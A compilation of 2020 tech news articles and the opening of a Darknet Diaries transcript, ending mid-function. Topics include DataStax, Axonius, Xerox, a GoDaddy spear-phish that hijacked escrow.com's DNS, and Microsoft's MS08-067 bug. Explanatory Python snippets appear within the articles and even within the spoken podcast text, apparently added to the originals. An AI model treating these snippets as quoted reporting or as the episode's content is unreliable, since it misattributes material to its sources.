DataStax launches Kubernetes operator for open source Cassandra database

Today, DataStax, the commercial company behind the open source Apache Cassandra project, announced an open source Kubernetes operator developed by the company to run a cloud native version of the database.

When Sam Ramji, chief strategy officer at DataStax, came over from Google last year, the first thing he did was take the pulse of customers, partners and community members around Kubernetes and Cassandra, and he found surprisingly limited support.

While some companies had built Kubernetes operators themselves, DataStax lacked one to call its own. Given that Kubernetes was born inside Google, a company that has widely embraced containerization, Ramji wanted an operator designed by DataStax to give customers a general starting point with Kubernetes.

“What’s special about the Kube operator that we’re offering to the community as an option — one of many — is that we have done the work to generalize the operator to Cassandra wherever it might be implemented,” Ramji told TechCrunch.

Ramji says that most companies that have created their own Kubernetes operators tend to specialize them for their own particular requirements, which is fine, but as a company built on top of Cassandra, DataStax wanted to come up with a general version that could appeal to a broader range of use cases.

In Kubernetes, the operator is how the DevOps team packages, manages and deploys an application, giving it the instructions it needs to run correctly. DataStax has created this operator specifically to run Cassandra with a broad set of assumptions.
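To make that concrete, here is a minimal sketch of what using an operator looks like in practice, via the official Kubernetes Python client. The custom resource group, kind and spec fields below are illustrative assumptions, not DataStax's published schema:

```python
# Minimal sketch: asking a Cassandra operator for a cluster by creating a
# custom resource. The operator's reconcile loop watches for this resource
# and creates/repairs the StatefulSets and services needed to satisfy it.
# The CRD group/kind and spec fields are hypothetical, for illustration.
from kubernetes import client, config

config.load_kube_config()  # or load_incluster_config() inside a pod

cassandra_dc = {
    "apiVersion": "cassandra.example.com/v1",  # hypothetical CRD group/version
    "kind": "CassandraDatacenter",             # hypothetical kind
    "metadata": {"name": "dc1", "namespace": "cassandra"},
    "spec": {
        "clusterName": "demo-cluster",
        "size": 3,              # desired Cassandra node count
        "storage": "100Gi",
    },
}

client.CustomObjectsApi().create_namespaced_custom_object(
    group="cassandra.example.com",
    version="v1",
    namespace="cassandra",
    plural="cassandradatacenters",
    body=cassandra_dc,
)
```

The point of the operator pattern is exactly this division of labor: the user declares the desired state in one small resource, and the operator carries the operational know-how for turning that into a healthy running database.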

Cassandra is a powerful database because it stays running when many others fall down. As such, it is used by companies as varied as Apple, eBay and Netflix to run their key services. This new Kubernetes operator will let anyone run Cassandra as a containerized application, helping push it into the modern development realm.

The company also announced a free help service for engineers trying to cope with increased usage on their databases due to COVID-19, a program it is calling “Keep Calm and Cassandra On.” The engineers charged with keeping systems like Cassandra running are called site reliability engineers, or SREs.

“The new service is completely free SRE-to-SRE support calls. So our SREs are taking calls from Apache Cassandra users anywhere in the world, no matter what version they’re using, if they’re trying to figure out how to keep it up to stand up to the increased demand,” Ramji explained.

DataStax was founded in 2010 and has raised over $190 million, according to PitchBook data.

Axonius nabs $58M for its cybersecurity-focused network asset management platform

As companies get to grips with a wider (and, lately, more enforced) model of remote working, a startup that provides a platform to help track and manage all the devices accessing networked services — an essential component of cybersecurity policy — has raised a large round of growth funding. Axonius, a New York-based company that lets organizations manage and track the computing-based assets connecting to their networks — and then plug that data into some 100 different cybersecurity tools to analyse it — has picked up a Series C of $58 million, money it will use to continue investing in its technology (its R&D offices are in Tel Aviv, Israel) and expanding its business overall.

The round is being led by prolific enterprise investor Lightspeed Venture Partners, with previous backers OpenView, Bessemer Venture Partners, YL Ventures, Vertex, and WTI also participating in the round.

Dean Sysman, CEO and Co-Founder at Axonius, said in an interview that the company is not disclosing its valuation, but for some context, the company has now raised $95 million, and PitchBook noted that in its last round, a $20 million Series B in August 2019, it had a post-money valuation of $110 million.

The company has had a huge boost in business in the last year, however — especially right now. That’s no surprise for a company that helps enable secure remote working, at a time when many businesses have gone remote to follow government policies encouraging social distancing to slow the spread of the coronavirus. As of this month, Axonius has seen customer growth of 910% compared to a year ago.

Sysman said that this round had been in progress for some time ahead of the announcement being made, but the final stages of closing it were all done remotely last week, which has become something of a new normal in venture deals at the moment.

“We’ve all been staying at home for the last few weeks,” he said in an interview. “The crisis is not helping with deals. It’s making everything more complex for sure. But specifically for us there wasn’t a major difference in the process.”

Sysman said that he first thought of the idea for Axonius at a previous organization — his experience includes several years with the Israeli Defense Forces, as well as time at a startup called Integrity Project, acquired by Mellanox — where he realised that the organization itself, and all of its customers, never actually knew how many devices accessed their networks. Knowing that is a crucial first step in being able to secure any network.

“Every CIO I met I would ask, do you know how many devices you have on your network? And the answer was either ‘I don’t know,’ or a big range, which is just another way of saying, ‘I don’t know,’” Sysman said. “It’s not because they’re not doing their jobs but because it’s just a tough problem.”

Part of the reason, he added, is because IP addresses are not precise enough, and de-duplicating and correlating numbers is a gargantuan task, especially in the current climate of people using not just a multitude of work-provided devices, but a number of their own.

That was what prompted Sysman and his co-founders Ofri Shur and Avidor Bartov to build the algorithms that formed the basis of what Axonius is today. It’s not based on behavioural data as some cybersecurity systems are, but on something that Sysman describes as “a deterministic algorithm that knows and builds a unique set of identifiers that can be based on anything, including timestamp, or cloud information. We try to use every piece of data we can.”
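As a rough illustration of what deterministic correlation means (a toy sketch, not Axonius's algorithm), records from different tools can be merged whenever they share any strong identifier:

```python
# Toy sketch of deterministic asset correlation (not Axonius's code):
# records from different tools are merged whenever they share any strong
# identifier (MAC, serial, cloud instance ID), so one physical device ends
# up as one asset no matter how many tools report it. A production version
# would need union-find to merge chains of partially overlapping records.
def correlate(records):
    assets = []   # each asset is a list of merged records
    index = {}    # identifier value -> position in assets
    for rec in records:
        ids = {v for k, v in rec.items()
               if k in ("mac", "serial", "cloud_id") and v}
        hit = next((index[i] for i in ids if i in index), None)
        if hit is None:
            hit = len(assets)
            assets.append([])
        assets[hit].append(rec)
        for i in ids:
            index[i] = hit
    return assets

devices = correlate([
    {"mac": "aa:bb", "source": "EDR"},
    {"mac": "aa:bb", "serial": "SN1", "source": "MDM"},  # same laptop
    {"cloud_id": "i-0abc", "source": "AWS"},             # separate VM
])
print(len(devices))  # 2 unique assets from 3 reports
```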

The resulting information becomes a very valuable asset in itself, even if the data may seem a little pedestrian on its own. It can be used across a number of other pieces of security software to search for inconsistencies in use (bringing in the behavioural aspect of cybersecurity) or other indicators of malicious activity — following the company’s motto, “Know Your Assets, Identify Gaps, and Automate Security Policy Enforcement.”

“We like to call ourselves the Toyota Camry of cybersecurity,” Sysman said. “It’s nothing exotic in a world of cutting-edge AI and advanced tech. However it’s a fundamental thing that people are struggling with, and it is what everyone needs. Just like the Camry.”

For now, Axonius is following the route of providing a platform that can interconnect with a number of other security products — currently around 100 — rather than building those tools itself or acquiring them to bring them in-house. That could be one way it evolves over time, however.

For now, the idea of being agnostic to those specific tools and providing a platform just to identify and manage assets is a formula that has already seen a lot of traction with customers — which include companies like Schneider Electric, the New York Times, and Landmark Medical, among others — as well as investors.

“Any enterprise CISO’s top priority, with unwavering consistency, is asset discovery and management. You can’t protect a device if you don’t know it exists,” said Arsham Menarzadeh, general partner at Lightspeed Venture Partners, in a statement. “Axonius integrates into any security and management product to show customers their full asset landscape and automate policy enforcement. Their integrated approach and remediation capabilities position them to become the operating system and single source of truth for security and IT teams. We’re excited to play a part in helping them scale.”

Xage adds full-stack data protection to blockchain security platform

Xage, a startup that has been taking an unusual path to securing legacy industries like oil and gas and utilities with help from the blockchain, announced a new data protection service today.

Xage CEO Duncan Greatwood says that up until this point, the company has concentrated on protecting customers at the machine layer, but today’s announcement involves protecting data as it travels between parties, which is more of a classic blockchain security scenario.

“We are moving beyond the protection of machines with greater focus on the protection of data. And this announcement around Dynamic Data Security that we’re delivering today is really a data protection layer that spans multiple dimensions. So it spans from the physical machine layer right up to business transaction,” Greatwood explained.

He says that what separates his company from competitors is the ability to have that protection up and down the stack. “We can guarantee the authenticity, integrity and the confidentiality of data, as it’s produced at the machine, and we can maintain that all the way to [delivery to the various parties],” he said.

Greatwood says that this solution is designed to help protect data even in highly complex data-sharing scenarios, using the blockchain as the trust mechanism. Imagine a supply chain scenario in which the parties are sharing data, but each participant only needs to see the piece of data required to complete their part of the transaction and no more. To do this, Xage has the concept of a security fabric, which acts as a layer of protection across the platform.

“What Xage is doing is to use this kind of security outsource approach we bring to authenticity, integrity and confidentiality, and then using the fabric to replicate all of that security metadata across the extent of the fabric, which may very well cover multiple locations and multiple participants,” he said.
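The general pattern Greatwood describes might look something like this toy sketch (purely illustrative, not Xage's implementation): fingerprint data where it is produced, replicate the fingerprint across fabric nodes, and verify integrity at delivery:

```python
# Toy illustration of the pattern (not Xage's implementation): hash data at
# the machine that produces it, replicate the hash to every fabric node,
# and verify at delivery by recomputing and comparing against a majority.
import hashlib, json

def fingerprint(record: dict) -> str:
    canonical = json.dumps(record, sort_keys=True).encode()
    return hashlib.sha256(canonical).hexdigest()

fabric_nodes = [set(), set(), set()]   # stand-ins for replicated metadata stores

# Producer side: a machine emits a reading; the fabric stores its hash.
reading = {"sensor": "pump-7", "psi": 212.4, "ts": "2020-03-31T12:00:00Z"}
for node in fabric_nodes:
    node.add(fingerprint(reading))     # metadata replicated across locations

# Consumer side: a participant checks received data against a majority of
# fabric nodes before trusting it (up to and including paying on it).
def verify(record: dict, nodes) -> bool:
    digest = fingerprint(record)
    return sum(digest in n for n in nodes) > len(nodes) // 2

print(verify(reading, fabric_nodes))                    # True
print(verify({**reading, "psi": 150.0}, fabric_nodes))  # False: tampered
```

A real fabric also has to handle access policy (who may see which fields), which the sketch leaves out entirely.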

This approach enables customers to have confidence in the provenance and integrity of the data they are seeing. “We’re able to allow all of the participants to define a set of security policies that gives them control of their own data, but it also allows them to share very flexibly with the rest of the participants in the ecosystem, and to have confidence in that data, up to and including the point where they’ll pay each other money, based on the integrity of the data.”

The new solution is available today. It has been in testing with three beta customers: an oil and gas company, a utility and a smart city.

Xage was founded in 2016 and has raised just over $16 million, according to PitchBook data.

Amid shift to remote work, application performance monitoring is IT’s big moment

In recent weeks, millions have started working from home, putting unheard-of pressure on services like video conferencing, online learning, food delivery and e-commerce platforms. While some verticals have seen a marked reduction in traffic, others are being asked to scale to new heights.

Services that were previously nice to have are now necessities, but how do organizations track pressure points that can add up to a critical failure? There is actually a whole class of software to help in this regard.

Monitoring tools like Datadog, New Relic and Elastic are designed to help companies understand what’s happening inside their key systems and warn them when things may be going sideways. That’s absolutely essential as these services are being asked to handle unprecedented levels of activity.

At a time when performance is critical, application performance monitoring (APM) tools are helping companies stay up and running. They also help track down root causes should the worst happen and a service go down, with the goal of getting it back up as quickly as possible.
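Under the hood, the core loop these tools automate is simple to sketch. Here is a toy example, with invented names and thresholds, of timing requests and alerting on a latency budget:

```python
# Bare-bones sketch of what an APM agent automates: time each request,
# keep recent samples, and flag trouble before it becomes an outage.
# The names and the 250ms p95 budget are illustrative, not any vendor's.
import time
from collections import deque

samples = deque(maxlen=1000)          # rolling window of latencies, in ms
P95_BUDGET_MS = 250

def timed(handler):
    def wrapper(*args, **kwargs):
        start = time.monotonic()
        try:
            return handler(*args, **kwargs)
        finally:
            samples.append((time.monotonic() - start) * 1000.0)
    return wrapper

def p95() -> float:
    ordered = sorted(samples)
    return ordered[int(0.95 * (len(ordered) - 1))] if ordered else 0.0

@timed
def checkout():
    time.sleep(0.02)                  # stand-in for real work

for _ in range(50):
    checkout()
print(f"p95 latency: {p95():.0f}ms")
if p95() > P95_BUDGET_MS:
    print("ALERT: latency budget blown, page the on-call SRE")
```

Commercial APM products layer distributed tracing, error tracking and anomaly detection on top of this basic idea.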

We spoke to a few monitoring vendor CEOs to understand better how they are helping customers navigate this demand and keep systems up and running when we need them most.


Microsoft launches Edge Zones for Azure

Microsoft today announced the launch of Azure Edge Zones, which will allow Azure users to bring their applications to the company’s edge locations. The focus here is on enabling real-time low-latency 5G applications. The company is also launching a version of Edge Zones with carriers (starting with AT&T) in preview, which connects these zones directly to 5G networks in the carrier’s data center. And to round it all out, Azure is also getting Private Edge Zones for those who are deploying private 5G/LTE networks in combination with Azure Stack Edge.

In addition to partnering with carriers like AT&T, as well as Rogers, SK Telecom, Telstra and Vodafone, Microsoft is also launching new standalone Azure Edge Zones in more than 10 cities over the next year, starting with LA, Miami and New York later this summer.

“For the last few decades, carriers and operators have pioneered how we connect with each other, laying the foundation for telephony and cellular,” the company notes in today’s announcement. “With cloud and 5G, there are new possibilities by combining cloud services, like compute and AI, with high bandwidth and ultra-low latency. Microsoft is partnering with them to bring 5G to life in immersive applications built by organizations and developers.”

This may all sound a bit familiar, and that’s because only a few weeks ago, Google launched Anthos for Telecom and its Global Mobile Edge Cloud, which at first glance offers a similar promise of bringing applications close to that cloud’s edge locations for 5G and telco usage. Microsoft argues that its offering is more comprehensive in terms of its partner ecosystem and geographic availability. But it’s clear that 5G is a trend all of the large cloud providers are trying to tap into. Microsoft’s own acquisition of 5G cloud specialist Affirmed Networks is yet another example of how it is looking to position itself in this market.

As far as the details of the various Edge Zone versions go, the focus of Edge Zones is mostly on IoT and AI workloads, while Microsoft notes that Edge Zones with Carriers is more about low-latency online gaming, remote meetings and events, as well as smart infrastructure. Private Edge Zones, which combine private carrier networks with Azure Stack Edge, are something only a small number of large enterprises would be likely to look into, given the cost and complexity of rolling out a system like this.

 

Palo Alto Networks to acquire CloudGenix for $420M

Palo Alto Networks announced today that it has an agreement in place to acquire CloudGenix for $420 million.

CloudGenix delivers a software-defined wide area network (SD-WAN) that helps customers stay secure by setting policies to enforce compliance with company security protocols across distributed locations. This is especially useful for companies with a lot of branch offices or a generally distributed workforce, something just about everyone is dealing with at the moment as we find millions suddenly working from home.

Nikesh Arora, chairman and CEO at Palo Alto Networks, says that this acquisition should contribute to Palo Alto’s “secure access service edge,” or SASE, solution, as it is known in industry parlance.

“As the enterprise becomes more distributed, customers want agile solutions that just work, and that applies to both security and networking. Upon the close of the transaction, the combined platform will provide customers with a complete SASE offering that is best-in-class, easy to deploy, cloud-managed, and delivered as a service,” Arora said in a statement.

CloudGenix was founded in 2013 by Kumar Ramachandran, Mani Ramasamy and Venkataraman Anand, all of whom will be joining Palo Alto Networks as part of the deal. It has 250 customers across a variety of verticals. The company has raised almost $100 million, according to PitchBook data.

Palo Alto Networks has been on an acquisitive streak. Going back to February 2019, this represents the sixth company it has acquired, to the tune of more than $1.6 billion overall.

The acquisition is expected to close in the fourth quarter, subject to customary regulatory approvals.

Xerox drops $34B HP takeover bid amid COVID-19 uncertainty

Xerox announced today that it would be dropping its hostile takeover bid of HP. The drama began last fall with a flurry of increasingly angry letters between the two companies, and confrontational actions from Xerox, including an attempt to take over the HP board that had rejected its takeover overtures.

All that came crashing to the ground today when Xerox officially announced it was backing down amid worldwide economic uncertainty related to the COVID-19 pandemic. The company also indicated it was dropping its bid to take over the board.

“The current global health crisis and resulting macroeconomic and market turmoil caused by COVID-19 have created an environment that is not conducive to Xerox continuing to pursue an acquisition of HP Inc. (NYSE: HPQ) (‘HP’). Accordingly, we are withdrawing our tender offer to acquire HP and will no longer seek to nominate our slate of highly qualified candidates to HP’s Board of Directors,” the company said in a statement.

As for HP, it said it was strong financially and would continue to drive shareholder value, regardless of the outcome:

We remain firmly committed to driving value for HP shareholders. HP is a strong company with market leading positions across Personal Systems, Print, and 3D Printing & Digital Manufacturing. We have a healthy cash position and balance sheet that enable us to navigate unanticipated challenges such as the global pandemic now before us, while preserving strategic optionality for the future.

The bid never made a lot of sense. Xerox is a much smaller company, with a market cap of around $4 billion, compared with HP’s market cap of almost $25 billion. It was truly a case of the canary trying to eat the cat.

Yet Xerox continued to insist today, even while admitting defeat, that it would have been better to combine the two companies, something HP never felt was realistic. HP questioned the ability of Xerox to come up with such a large sum of money and, if it did, whether it would be financially stable enough to pull off a deal like this.

Yet even as recently as last month, Xerox increased the bid from $22 to $24 per share in an effort to entice shareholders to bite. It had previously threatened to bypass the board and go directly to shareholders before attempting to replace the board altogether.

HP didn’t like the hostility inherent in the bid or any of the subsequent moves Xerox made to try to force a deal. Last month, HP offered its investors billions in give-backs in an effort to convince them to reject the Xerox bid. As it turned out, the drama simply fizzled out in the middle of a worldwide crisis.

Phish of GoDaddy Employee Jeopardized Escrow.com, Among Others

A spear-phishing attack this week hooked a customer service employee at GoDaddy.com, the world’s largest domain name registrar, KrebsOnSecurity has learned. The incident gave the phisher the ability to view and modify key customer records, access that was used to change domain settings for a half-dozen GoDaddy customers, including transaction brokering site escrow.com.

Escrow.com helps people safely broker all sorts of transactions online (ironically enough, brokering domain sales is a big part of its business). For about two hours starting around 5 p.m. PT Monday evening, Escrow.com’s website looked radically different: Its homepage was replaced with a crude message in plain text:

The profanity-laced message left behind by whoever briefly hijacked the DNS records for escrow.com. Image: Escrow.com

DomainInvesting.com’s Elliot Silver picked up on the change and got a statement from Matt Barrie, the CEO of freelancer.com, which owns escrow.com.

“During the incident, the hackers changed the DNS records for Escrow.com to point to a third-party web server,” Barrie wrote, noting that his security team managed to talk to the hacker responsible for the hijack via telephone.

Barrie said escrow.com would be sharing more details about the incident in the coming days, but he emphasized that no escrow.com systems were compromised, and no customer data, funds or domains were compromised.

KrebsOnSecurity reached out to Barrie and escrow.com with some follow-up questions, and immediately after that pinged Chris Ueland, CEO of SecurityTrails, a company that helps customers keep track of their digital assets.

Ueland said after hearing about the escrow.com hack Monday evening, he pulled the domain name system (DNS) records for escrow.com and saw they were pointing to an Internet address in Malaysia — 111.90.149[.]49 (the address is hobbled here because it is currently flagged as hosting a phishing site). The attacker also obtained free encryption certificates for escrow.com from Let’s Encrypt.

Running a reverse DNS lookup on this 111.90.149[.]49 address shows it is tied to fewer than a dozen domains, including a 12-day-old domain that invokes the name of escrow.com’s registrar — servicenow-godaddy[.]com. Sure enough, loading that domain in a browser reveals the same text that appeared Monday night on escrow.com, minus the redaction above.
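For the curious, the live half of such a check is nearly a one-liner; passive-DNS services like SecurityTrails add the historical view that a live lookup cannot. The address below is a placeholder:

```python
# A live reverse DNS (PTR) lookup. socket.gethostbyaddr asks the resolver
# which hostname the address owner has published for that IP; it says
# nothing about history, which is where passive-DNS services come in.
import socket
from typing import Optional

def reverse_dns(ip: str) -> Optional[str]:
    try:
        hostname, _aliases, _addresses = socket.gethostbyaddr(ip)
        return hostname
    except socket.herror:
        return None  # no PTR record published for this address

print(reverse_dns("8.8.8.8"))  # e.g. "dns.google"
```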

The message at servicenow-godaddy[.]com was identical to the one displayed by escrow.com while the site’s DNS records were hacked.

It was starting to look like someone had gotten phished. Then I heard back from Matt Barrie, who said it wasn’t anyone at escrow.com that got phished. Barrie said the hacker was able to read messages and notes left on escrow.com’s account at GoDaddy that only GoDaddy employees should have been able to see.

Barrie said one of those notes stated that certain key changes for escrow.com could only be made after calling a specific phone number and receiving verbal authorization. As it happened, the attacker went ahead and called that number, evidently assuming he was calling someone at GoDaddy.

In fact, the name and number belonged to escrow.com’s general manager, who played along for more than an hour talking to the attacker while recording the call and coaxing information out of him.

“This guy had access to the notes, and knew the number to call,” to make changes to the account, Barrie said. “He was literally reading off the tickets to the notes of the admin panel inside GoDaddy.”

A WHOIS lookup on escrow.com Monday evening via the Windows PowerShell built into Windows 10. Image: SecurityTrails

In a statement shared with KrebsOnSecurity, GoDaddy acknowledged that on March 30 the company was alerted to a security incident involving a customer’s domain name. An investigation revealed a GoDaddy employee had fallen victim to a spear-phishing attack, and that five other customer accounts were “potentially” affected — although GoDaddy wouldn’t say which or how many domains those customer accounts may have with GoDaddy.

“Our team investigated and found an internal employee account triggered the change,” the statement reads. “We conducted a thorough audit on that employee account and confirmed there were five other customer accounts potentially impacted.”

The statement continues:

“We immediately locked down the impacted accounts involved in this incident to prevent further changes. Any actions done by the threat actor have been reverted and the impacted customers have been notified. The employee involved in this incident fell victim to a spear-fishing or social engineering attack. We have taken steps across our technology, processes and employee education, to help prevent these types of attacks in the future.”

There are many things domain owners can and should do to minimize the chances that domain thieves can wrest control over a business-critical domain, but much of that matters little if and when someone at your domain name registrar gets phished or hacked.

But increasingly, savvy attackers are focusing their attention on targeting people at domain registrars and their support personnel. In January, KrebsOnSecurity told the harrowing story of e-hawk.net, an online fraud prevention and scoring service that had its domain name fraudulently transferred to another provider after someone social engineered a customer service representative at e-hawk’s registrar.

Nation-state level attackers also are taking a similar approach. A massive cyber espionage campaign targeting a slew of domains for government agencies across the Middle East region between 2018 and 2019 was preceded by a series of targeted attacks on domain registrars and Internet infrastructure firms that served those countries.

While there is very little you can do to prevent your domain registrar from getting phished or tricked by scammers, there are several precautions that you can control. For maximum security on your domains, consider adopting some or all of the following best practices:

-Use 2-factor authentication, and require it to be used by all relevant users and subcontractors.

-In cases where passwords are used, pick unique passwords and consider password managers.

-Review the security of existing accounts with registrars and other providers, and make sure you have multiple notifications in place when and if a domain you own is about to expire.

-Use registration features like Registry Lock that can help protect domain name records from being changed. Note that this may increase the amount of time it takes going forward to make key changes to the locked domain (such as DNS changes).

-Use DNSSEC (both signing zones and validating responses).

-Use access control lists for applications, Internet traffic and monitoring.

-Monitor the issuance of new SSL certificates for your domains, for example by watching Certificate Transparency logs (see the sketch below).
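That last item is straightforward to automate. Here is a minimal sketch of one way to do it, polling crt.sh's JSON interface; the domain and the known_issuers list are placeholders, and crt.sh is just one of several CT search services:

```python
# Watch Certificate Transparency logs for certs issued for your domain.
# Any certificate you didn't request deserves immediate investigation.
import requests

def recent_certs(domain: str) -> list:
    resp = requests.get(
        "https://crt.sh/",
        params={"q": domain, "output": "json"},
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json()

known_issuers = {"Let's Encrypt", "DigiCert"}   # the CAs you actually use
for cert in recent_certs("example.com"):
    issuer = cert.get("issuer_name", "")
    if not any(ca in issuer for ca in known_issuers):
        print("Unexpected issuer:", issuer, "->", cert.get("name_value"))
```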

Darknet Diaries | MS08-067 | What Happens When Microsoft Discovers a Major Vulnerability within Windows

Listen to what goes on internally when Microsoft discovers a major vulnerability within Windows. This is the story of what happened when Microsoft found a massive bug in Windows which paved the way for the largest worm in history. Guest John Lambert gives the inside story to Jack Rhysider.

This episode is sponsored by SentinelOne. To learn more about our endpoint security solutions and get a 30-day free trial, visit sentinelone.com/darknetdiaries.

Enjoy!


Hey, it’s Jack, host of the show. Let me ask you a question. Whose job is it to keep the roads you drive on safe? Is it the driver’s sole responsibility? What about the car makers? Are they responsible for keeping the roads safe for other drivers? What about the cops? Maybe they need to come by and watch everyone to make sure they’re obeying the law and keeping everyone safe. Or maybe it’s the job of the civil engineers, the people who design the roads. I mean, a crazy, curvy, bumpy road with a speed limit of 100 miles per hour is obviously not safe, so it must be their job to design it to be as safe as possible. Right? So whose job is it to keep the roads safe?

All these people. We need drivers to drive safe. We need cars to be built with safety in mind. We need cops to catch people who aren’t being safe. And we need civil engineers to design us safe roads. And I think this analogy applies to keeping our networks and computers safe, too. We need users to be smart about what they click on and do. We need software makers to design their software to be secure. We need the cops to arrest people when they break the law. And we need groups who set up industry standards that guide us to safety. We cannot rely on one person to keep our networks safe. It takes all these people, always vigilant, to keep our computers safe.

And this is a story about what happens when a software maker finds a bug in their own software, and what the effects were. Specifically, this is a story about when Microsoft found a massive bug in Windows which paved the way for the largest worm in history.

These are true stories from the dark side of the Internet.

I’m Jack Rhysider. This is Darknet Diaries.

Support for this episode comes from SentinelOne. It’s all too common: a family member or colleague calls asking for help because some kind of ransomware has infected their computer. Bummer. Now imagine this on the scale of an entire organization. This is exactly what SentinelOne was built to prevent and solve. Besides the ability to prevent ransomware, and even roll back ransomware if data has been encrypted, SentinelOne also has a ransomware warranty. Visibility into each of these endpoints is available from an easy-to-use console, allowing security teams to be more efficient without the need to hire more and more people. On top of that, SentinelOne offers threat hunting, visibility and remote administration tools to manage and protect any IoT devices connected to your network. With SentinelOne, you can replace many products with one. If you’re a CSO, a security leader or an IT manager in the enterprise, don’t settle to live in the past. Get a personalized demo and a 30-day free trial that allows you to see the benefits up close and personal. Go to sentinelone.com/darknetdiaries for your free demo.

Your cybersecurity future starts today with SentinelOne.

I’m very excited about this episode because I think this is a rare story to hear. We aren’t going to hear from the hacker who found the exploit and we aren’t gonna hear from the company who got hacked by this exploit. Instead, we’re gonna go right to the source to hear the story of one of the most notorious bugs ever, right from the horse’s mouth. Microsoft.

Hello. Hey, Jack, can you hear me? Yeah, I hear you pretty well. What kind of mic are you using?

This is a headset. It’s actually made by Microsoft. This is John Lambert. My name is John Lambert and I work at Microsoft.

He’s been with Microsoft a long time. While he was there, he spent 10 years working on a team called the Trustworthy Computing Group.

So that was a group that was created after the early worms, Code Red, Nimda, Blaster, Slammer. And it was designed to help improve customer trust in Microsoft products by fortifying them from a security, privacy and reliability perspective. The domain I worked in was security. And so a lot of that focus was on finding and eliminating vulnerabilities in the design and coding of the products, and working across Microsoft’s products, not just Windows or Office but all of the products, to sort of build in the techniques that security researchers had familiarity with, and then inculcating that sort of ethos and know-how inside of the Microsoft development cycle.

Well, what an interesting role to have, right? His mission is to improve the trust people have in Microsoft products by making them more secure. And I just looked this up: in 2008, Microsoft had ninety-one thousand employees. With that many employees, yeah, I guess it makes sense to make a team to improve the trust of their products. Oh, and in case you’re wondering, in 2019 they had one hundred and forty-four thousand employees. Now, of course, the biggest Microsoft product that John would work with is Windows, the operating system itself. John got the ability to examine Windows in unique ways by looking at the source code, building relationships with developers and conducting security tests against it. It’s not really his job to make sure all the bugs are squashed or to find the bugs, but he was certainly involved in getting all the teams together to help find the bugs and get them fixed. Okay. Now, when the team at Microsoft finds a bug in Windows, they give it to the developers, who then work on a fix and create a patch for it.

And they issue these patches on Tuesdays. Every Patch Tuesday, which is every second Tuesday of the month, we will create a number of security bulletins. The bulletins essentially are the advisory that describes, here are the vulnerabilities that we are fixing in, say, Internet Explorer or Windows or Office. And every bulletin may have one or more vulnerabilities that are being fixed. Those have individual CVE identifiers that security professionals are familiar with. But the bulletin is essentially a grouping of them for a product.

And the bulletin is rated, you know, critical, important, moderate level of severity.

Now, these advisory bulletins put out on Patch Tuesday might have a name like MS07-029 or MS08-067. And if you see something like this, MS07-029, it means the advisory was published in 2007 and it was the twenty-ninth advisory of the year.
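If the naming scheme is easier to see in code, here is a tiny illustrative parser for these bulletin IDs (it assumes post-2000 bulletins; IDs in the MS99-xxx form also existed):

```python
# Decode a Microsoft security bulletin ID: "MS08-067" is the 67th
# bulletin published in 2008. Pre-2000 IDs (MS99-...) are out of scope.
import re

def parse_bulletin(bulletin_id: str) -> tuple:
    match = re.fullmatch(r"MS(\d{2})-(\d{3})", bulletin_id)
    if not match:
        raise ValueError(f"not a bulletin ID: {bulletin_id}")
    year, ordinal = match.groups()
    return 2000 + int(year), int(ordinal)

print(parse_bulletin("MS07-029"))  # (2007, 29)
print(parse_bulletin("MS08-067"))  # (2008, 67)
```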

So for this story, we’re gonna be talking about the security bulletin MS08-067, which means we’re talking about a bug that was found in 2008. Vista had just come out the year before, but its adoption rate wasn’t that strong, so the majority of Microsoft Windows customers were still using Windows XP. And take a guess at how many lines of code it took to create Windows XP. It’s 45 million lines of code.

And of course, that was spread out among many teams. Trying to keep a program that big bug-free is, well, in my opinion, impossible. It’s just way too big to keep bug-free. There has to be some function or routine in the code that didn’t get tested properly or coded properly and has a glaring bug. Or sometimes it gets tested and coded properly, but there’s a bug that’s not so glaring in there. It only appears under weird circumstances, like only when the memory is filled and it’s a certain millisecond at a certain time of day. Weird stuff happens when you have a code base that big. And all this is to say, because Windows XP was 45 million lines of code long, just by that size alone, it must have had a lot of bugs. But before we get to MS08-067, maybe we should talk about a bug found the year before, called MS07-029.

Okay, so MS07-029 was very important. It was sort of a moment of insight, if you will, for all the things that came after it. MS07-029 was a bulletin that corrected a vulnerability with Windows DNS. When Microsoft became aware of it, a customer that was being exploited in the wild contacted us and said, somehow we just got attacked, here is an attack tool that we were able to find associated with it, we think it’s exploiting a vulnerability somehow. And that goes into MSRC.

MSRC is the Microsoft Security Response Center. This is the team of security professionals within Microsoft that is in charge of making Windows secure, looking for bugs and getting them fixed. They took this report they got and tested it to see if you could hack into a fully updated Windows computer with it. And it worked.

And then they investigated and found this zero-day in Windows DNS that was being used. They put out an advisory. They put out a bulletin. And what I was doing was looking at this sort of crash dump system that Microsoft has, this Windows Error Reporting. And I was working with some engineers that were looking at the crash reports coming in associated with Windows DNS. The DNS product was otherwise very reliable and hardly ever crashed. And so the only crashes coming in at that point, when we looked at them, were actually attacks in the wild.

And when we started to examine them, we could tell that actually we could have known about this attack in the wild much earlier than the customer contacting us, if only we’d been able to pull these needles out of the massive haystack of crashes coming into Microsoft.

Someone’s using Windows or Internet Explorer or Microsoft Word, and the app suddenly crashes, and it says, do you want to send the crash data to Microsoft? This is what’s known as WER.

Yeah. So, Windows Error Reporting, WER. It’s also known internally as Dr. Watson. It’s really a technology that goes back to the late 90s. Both Office and Windows were independently working on, how do we get better data on how the products are crashing before we ship them, and then after we ship them? Other than customers calling customer support, how do we get data about how they’re faring in the wild? And so both Office and Windows had built features to collect crash reports at scale that could be automatically submitted by customers, and then run analysis tools against them to try to root-cause and bucket them, to say, okay, is this a new bug we don’t know about, or is this an existing bug that we do know about happening again? And those two efforts came together, and that feature was built into Windows, and that was called Windows Error Reporting.

So yeah, that little box that pops up when an app crashes will ask you if you want to send the crash report to Microsoft.

And if they say yes, then that communicates with Microsoft and the backend system decides, is this something we already know about or is this something new? And if it’s new, it starts to prompt the user to potentially upload more data so we can root cause the issue further.
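To make the bucketing idea concrete, here is a small illustrative sketch, not Microsoft's actual algorithm, of how a backend can collapse a flood of crash reports into distinct buckets and spot the new ones:

```python
# Illustrative sketch of crash bucketing (not Microsoft's algorithm):
# reduce each crash to a stable signature built from what failed and
# where, so identical bugs land in the same bucket no matter how many
# machines hit them, and a brand-new bucket stands out immediately.
import hashlib

def bucket_id(report: dict) -> str:
    signature = "|".join([
        report["app"], report["app_version"],
        report["faulting_module"], report["offset"],
    ])
    return hashlib.sha1(signature.encode()).hexdigest()[:12]

known_buckets = {}

def triage(report: dict) -> str:
    b = bucket_id(report)
    if b in known_buckets:
        known_buckets[b] += 1
        return "known bucket, count bumped"
    known_buckets[b] = 1
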